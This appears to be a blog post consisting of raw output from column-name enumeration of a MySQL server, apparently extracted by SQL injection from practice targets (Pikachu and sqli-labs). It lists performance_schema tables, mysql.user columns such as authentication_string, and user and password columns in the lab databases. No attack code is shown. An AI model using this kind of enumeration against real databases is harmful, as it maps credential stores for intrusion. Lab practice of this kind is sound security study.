the performance_schema database events_waits_history table the 3 column name  is:EVENT_NAME
the performance_schema database events_waits_history table the 5 column name  is:TIMER_START
the performance_schema database events_waits_current table the 9 column name  is:OBJECT_SCHEMA
the performance_schema database events_waits_history table the 7 column name  is:TIMER_WAIT
the performance_schema database events_waits_history_long table the 2 column name  is:EVENT_ID
the mysql database user table the 40 column name  is:max_user_connections
the performance_schema database events_waits_history_long table the 4 column name  is:SOURCE
the mysql database user table the 42 column name  is:authentication_string
the performance_schema database events_waits_history_long table the 8 column name  is:SPINS
the mysql database user table the 32 column name  is:Create_tablespace_priv
the performance_schema database events_waits_history_long table the 1 column name  is:THREAD_ID
the performance_schema database cond_instances table the 2 column name  is:OBJECT_INSTANCE_BEGIN
the performance_schema database events_waits_summary_by_thread_by_event_ table the 1 column name  is:!!
the performance_schema database events_waits_summary_global_by_event_nam table the 1 column name  is:!!
the performance_schema database events_waits_history table the 11 column name  is:OBJECT_TYPE
the performance_schema database events_waits_history table the 14 column name  is:OPERATION
the performance_schema database events_waits_current table the 13 column name  is:NESTING_EVENT_ID
the performance_schema database events_waits_current table the 15 column name  is:NUMBER_OF_BYTES
the performance_schema database events_waits_history table the 10 column name  is:OBJECT_NAME
the performance_schema database events_waits_history_long table the 3 column name  is:EVENT_NAME
the performance_schema database events_waits_history table the 9 column name  is:OBJECT_SCHEMA
the performance_schema database events_waits_history_long table the 6 column name  is:TIMER_END
the performance_schema database events_waits_history_long table the 16 column name  is:FLAGS
the performance_schema database events_waits_history_long table the 5 column name  is:TIMER_START
the performance_schema database events_waits_history_long table the 7 column name  is:TIMER_WAIT
the performance_schema database events_waits_history table the 13 column name  is:NESTING_EVENT_ID
the performance_schema database events_waits_history table the 15 column name  is:NUMBER_OF_BYTES
the performance_schema database events_waits_history_long table the 11 column name  is:OBJECT_TYPE
the performance_schema database events_waits_history_long table the 14 column name  is:OPERATION
the performance_schema database events_waits_history_long table the 10 column name  is:OBJECT_NAME
the performance_schema database events_waits_current table the 12 column name  is:OBJECT_INSTANCE_BEGIN
the performance_schema database events_waits_summary_by_instance table the 1 column name  is:EVENT_NAME
the performance_schema database events_waits_history_long table the 9 column name  is:OBJECT_SCHEMA
the performance_schema database events_waits_summary_by_instance table the 3 column name  is:COUNT_STAR
the performance_schema database file_instances table the 1 column name  is:FILE_NAME
the performance_schema database file_instances table the 2 column name  is:EVENT_NAME
the performance_schema database mutex_instances table the 1 column name  is:NAME
the performance_schema database file_summary_by_event_name table the 1 column name  is:EVENT_NAME
the performance_schema database file_summary_by_event_name table the 2 column name  is:COUNT_READ
the performance_schema database events_waits_history_long table the 13 column name  is:NESTING_EVENT_ID
the performance_schema database file_instances table the 3 column name  is:OPEN_COUNT
the performance_schema database events_waits_summary_by_instance table the 6 column name  is:AVG_TIMER_WAIT
the performance_schema database file_summary_by_instance table the 2 column name  is:EVENT_NAME
the performance_schema database events_waits_history_long table the 15 column name  is:NUMBER_OF_BYTES
the performance_schema database events_waits_summary_by_instance table the 4 column name  is:SUM_TIMER_WAIT
the performance_schema database file_summary_by_instance table the 1 column name  is:FILE_NAME
the performance_schema database events_waits_history table the 12 column name  is:OBJECT_INSTANCE_BEGIN
the performance_schema database events_waits_summary_by_instance table the 7 column name  is:MAX_TIMER_WAIT
the performance_schema database file_summary_by_instance table the 3 column name  is:COUNT_READ
the performance_schema database events_waits_summary_by_instance table the 5 column name  is:MIN_TIMER_WAIT
the performance_schema database file_summary_by_event_name table the 3 column name  is:COUNT_WRITE
the performance_schema database rwlock_instances table the 1 column name  is:NAME
the performance_schema database setup_consumers table the 1 column name  is:NAME
the pikachu database httpinfo table the 1 column name  is:id
the performance_schema database file_summary_by_instance table the 4 column name  is:COUNT_WRITE
the performance_schema database setup_instruments table the 1 column name  is:NAME
the performance_schema database setup_timers table the 1 column name  is:NAME
the performance_schema database setup_instruments table the 3 column name  is:TIMED
the performance_schema database threads table the 3 column name  is:NAME
the performance_schema database performance_timers table the 1 column name  is:TIMER_NAME
the pikachu database member table the 1 column name  is:id
the performance_schema database setup_consumers table the 2 column name  is:ENABLED
the performance_schema database events_waits_history_long table the 12 column name  is:OBJECT_INSTANCE_BEGIN
the pikachu database member table the 3 column name  is:pw
the performance_schema database setup_instruments table the 2 column name  is:ENABLED
the performance_schema database threads table the 1 column name  is:THREAD_ID
the pikachu database message table the 1 column name  is:id
the pikachu database member table the 4 column name  is:sex
the pikachu database httpinfo table the 2 column name  is:userid
the pikachu database users table the 1 column name  is:id
the performance_schema database events_waits_summary_by_instance table the 2 column name  is:OBJECT_INSTANCE_BEGIN
the performance_schema database performance_timers table the 4 column name  is:TIMER_OVERHEAD
the performance_schema database setup_timers table the 2 column name  is:TIMER_NAME
the pikachu database message table the 3 column name  is:time
the performance_schema database performance_timers table the 2 column name  is:TIMER_FREQUENCY
the pikachu database xssblind table the 1 column name  is:id
the pikachu database member table the 7 column name  is:email
the performance_schema database file_summary_by_event_name table the 4 column name  is:SUM_NUMBER_OF_BYTES_READ
the security database emails table the 1 column name  is:id
the pikachu database httpinfo table the 4 column name  is:useragent
the security database referers table the 1 column name  is:id
the pikachu database xssblind table the 2 column name  is:time
the pikachu database member table the 5 column name  is:phonenum
the pikachu database message table the 2 column name  is:content
the performance_schema database mutex_instances table the 3 column name  is:LOCKED_BY_THREAD_ID
the pikachu database httpinfo table the 5 column name  is:httpaccept
the performance_schema database threads table the 2 column name  is:PROCESSLIST_ID
the pikachu database httpinfo table the 3 column name  is:ipaddress
the pikachu database member table the 2 column name  is:username
the performance_schema database performance_timers table the 3 column name  is:TIMER_RESOLUTION
the performance_schema database file_summary_by_event_name table the 5 column name  is:SUM_NUMBER_OF_BYTES_WRITE
the security database uagents table the 1 column name  is:id
the pikachu database users table the 4 column name  is:level
the pikachu database xssblind table the 4 column name  is:name
the pikachu database httpinfo table the 6 column name  is:remoteport
the security database users table the 1 column name  is:id
the pikachu database member table the 6 column name  is:address
the pikachu database xssblind table the 3 column name  is:content
the performance_schema database file_summary_by_instance table the 5 column name  is:SUM_NUMBER_OF_BYTES_READ
the performance_schema database mutex_instances table the 2 column name  is:OBJECT_INSTANCE_BEGIN
the pikachu database users table the 2 column name  is:username
the performance_schema database file_summary_by_instance table the 6 column name  is:SUM_NUMBER_OF_BYTES_WRITE
the performance_schema database rwlock_instances table the 4 column name  is:READ_LOCKED_BY_COUNT
the security database uagents table the 2 column name  is:uagent
the security database emails table the 2 column name  is:email_id
the pikachu database users table the 3 column name  is:password
the security database referers table the 2 column name  is:referer
the performance_schema database rwlock_instances table the 2 column name  is:OBJECT_INSTANCE_BEGIN
the performance_schema database rwlock_instances table the 3 column name  is:WRITE_LOCKED_BY_THREAD_ID
the security database uagents table the 4 column name  is:username
the security database users table the 2 column name  is:username
the security database users table the 3 column name  is:password
the security database referers table the 3 column name  is:ip_address
the security database uagents table the 3 column name  is:ip_address


posted @ 2023-08-07 08:07  lalallalalal  阅读(11)  评论(0编辑  收藏  举报